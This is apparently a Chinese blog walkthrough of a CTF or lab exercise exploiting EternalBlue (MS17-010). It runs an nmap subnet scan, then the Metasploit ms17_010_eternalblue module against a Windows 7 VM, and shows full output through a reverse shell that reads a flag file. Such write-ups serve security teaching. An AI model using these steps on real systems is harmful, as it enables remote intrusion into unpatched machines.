永恒之蓝测试

永恒之蓝漏洞利用测试

1.获取本机ip地址

1
2
3
4
5
6
7
8
9
10
root@Kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.230.133 netmask 255.255.255.0 broadcast 192.168.230.255
inet6 fe80::20c:29ff:fefb:93e6 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:fb:93:e6 txqueuelen 1000 (Ethernet)
RX packets 3097 bytes 219626 (214.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11461 bytes 1123362 (1.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

得到本机ip为192.168.230.133

2.扫描局域网内其余主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@Kali:~# nmap 192.168.230.133/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 11:44 EDT

......

Nmap scan report for promote.cache-dns.local (192.168.230.134)
Host is up (0.00027s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
10243/tcp open unknown
MAC Address: 00:0C:29:68:FF:4F (VMware)

......

可以看到有一台192.168.230.134主机开放了445端口,可以考虑利用永恒之蓝漏洞打一波

3.利用Metasploit Framework的永恒之蓝payload攻击目标主机

先验证是否可以攻击

1
2
3
4
5
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.230.134:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.230.134:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到提示可能利用MS17-010漏洞(永恒之蓝)去攻击,于是利用一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.230.133:4444
[+] 192.168.230.134:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.230.134:445 - Connecting to target for exploitation.
[+] 192.168.230.134:445 - Connection established for exploitation.
[+] 192.168.230.134:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.230.134:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.230.134:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.230.134:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.230.134:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.230.134:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.230.134:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.230.134:445 - Sending all but last fragment of exploit packet
[*] 192.168.230.134:445 - Starting non-paged pool grooming
[+] 192.168.230.134:445 - Sending SMBv2 buffers
[+] 192.168.230.134:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.230.134:445 - Sending final SMBv2 buffers.
[*] 192.168.230.134:445 - Sending last fragment of exploit packet!
[*] 192.168.230.134:445 - Receiving response from exploit packet
[+] 192.168.230.134:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.230.134:445 - Sending egg to corrupted connection.
[*] 192.168.230.134:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.230.133:4444 -> 192.168.230.134:49164) at 2019-09-22 11:49:08 -0400
[+] 192.168.230.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.230.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.230.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>

可以看到弹回了windows下cmd的shell,也就是攻击成功,在CTF中可以进行读取flag文件了

1
2
3
C:\Windows\system32>type C:\Users\Mask\Desktop\flag.txt
type C:\Users\Mask\Desktop\flag.txt
flag{Njust_Tp0t_Welcome}

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×